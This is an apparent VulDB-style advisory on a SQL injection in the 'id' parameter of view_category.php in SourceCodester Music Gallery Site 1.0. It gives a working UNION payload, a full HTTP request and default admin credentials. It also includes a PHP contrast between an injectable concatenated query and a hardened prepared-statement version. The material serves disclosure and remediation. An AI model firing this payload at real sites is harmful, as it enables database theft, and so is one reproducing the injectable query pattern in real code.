| Title | SourceCodester Music Gallery Site 1.0: GET request based SQL injection at view_category.php |
|---|---|

## Vendor Homepage
https://www.sourcecodester.com
## Software Link
https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html
## Version
v1.0
## Vulnerable URL
/php-music/admin/categories/view_category.php?id=
## Payload
view_category.php?id=1%27+and+false+union+select+1,version(),user(),4,5,6,7--+-
## Affected page
On the page "view_category.php", the parameter "id" is vulnerable to SQL injection.
## Description
In Music Gallery Site, after logging in as admin, under the categories list, updating a music category and intercepting the request sent upon clicking "view" shows that the GET request's "id" parameter is vulnerable to SQL injection.
## Proof of concept
1. Click on the admin panel and log in with the credentials. The admin credentials are username: admin and password: admin123.
2. Browse to the categories list.
3. Click on actions and the view option.
4. Intercept the traffic through Burp and get the actual URL.
5. Add the payload "%27+and+false+union+select+1,version(),user(),4,5,6,7--+-" to the "id" parameter.

Request
-------
```http
GET /php-music/admin/categories/view_category.php?id=1%27+and+false+union+select+1,version(),user(),4,5,6,7--+- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/php-music/admin/?page=categories
Cookie: PHPSESSID=pkk15gn7r4j3nrksvms44fd15t
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
```
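The page does not show the application's source, so the following is an added illustration (not the Music Gallery Site code) of the bug class it describes: a `view_category.php`-style handler that splices the `id` GET value into the SQL text, next to a hardened version that validates the parameter as an integer and binds it through a prepared statement. The table name `category_list`, the column names and the PDO connection are assumptions; the demo at the bottom runs against a constructed in-memory SQLite table so it works stand-alone.

```php
<?php
// Added example, not the Music Gallery Site source (which this page does not
// show). The table `category_list`, its columns and the PDO handle are assumed.

// Injectable pattern: the raw GET value is spliced into the SQL string, so a
// value that closes the quoted literal can append its own clauses. This is
// the shape of handler the page's request relies on; it is shown for contrast
// and the demo below never feeds it untrusted input.
function viewCategoryVulnerable(PDO $pdo, string $id): ?array
{
    $sql = "SELECT * FROM category_list WHERE id = '" . $id . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened pattern: reject anything that is not a positive integer before any
// query is built, then bind the value as a typed parameter so the database
// never parses it as SQL.
function viewCategorySafe(PDO $pdo, string $id): ?array
{
    $validated = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($validated === false) {
        http_response_code(400);   // malformed id: answer 400, touch no database
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM category_list WHERE id = :id');
    $stmt->bindValue(':id', $validated, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Stand-alone demo against a constructed in-memory SQLite table.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE category_list (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO category_list (id, name) VALUES (1, 'Rock'), (2, 'Jazz')");

// The page's payload, URL-decoded the way PHP would decode it into $_GET['id'].
$payload = urldecode('1%27+and+false+union+select+1,version(),user(),4,5,6,7--+-');

// A well-formed id is looked up normally.
var_dump(viewCategorySafe($pdo, '1'));

// The injected id fails integer validation and is rejected before any SQL is
// executed, which is the property the prepared-statement rewrite is meant to
// restore for this endpoint.
var_dump(viewCategorySafe($pdo, $payload));

// The vulnerable handler behaves identically on benign input; the difference
// only appears when the value carries SQL syntax.
var_dump(viewCategoryVulnerable($pdo, '1'));
```

Validation and binding are two separate defenses here: `filter_var` keeps anything but a positive integer from reaching the database at all, and `bindValue` with `PDO::PARAM_INT` means that even if the validation were loosened later, the value would still travel as data rather than as part of the statement.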
| Field | Value |
|---|---|
| User | Anonymous User |
| Submission | 02/27/2023 11:03 (3 years ago) |
| Moderation | 02/27/2023 11:43 (40 minutes later) |
| Status | Accepted |
| VulDB entry | 221819 [SourceCodester Music Gallery Site 1.0 view_category.php ID sql injection] |
| Points | 17 |